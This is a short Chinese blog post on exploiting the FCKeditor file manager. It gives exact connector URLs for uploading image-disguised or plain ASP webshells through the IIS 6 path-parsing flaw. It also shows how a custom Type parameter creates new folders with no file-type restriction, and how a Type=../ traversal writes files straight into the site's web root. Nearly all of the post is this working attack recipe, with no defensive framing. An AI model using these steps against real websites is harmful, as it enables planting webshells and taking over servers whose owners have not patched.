Fckeditor漏洞之利用解析漏洞

fckeditor/editor/filemanager/browser/default /browser.html?Type=Image&Connector=connectors/asp/connector.asp可以自定义 文件夹名称上传图片木马,利用2003路径解析漏洞,也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX
Type=Image这个变量是我们自己定义的。比如:
fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp
这时候我们就创建了一个名为xiaosei的目录,默认情况下没有任何文件格式上传限制
上传后我们的文件就保存在
/UserFiles/xiaosei下了
我们也可以这样
fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp这样文件就可以直接传到网站的根目录了

你可能感兴趣的:(职场,休闲)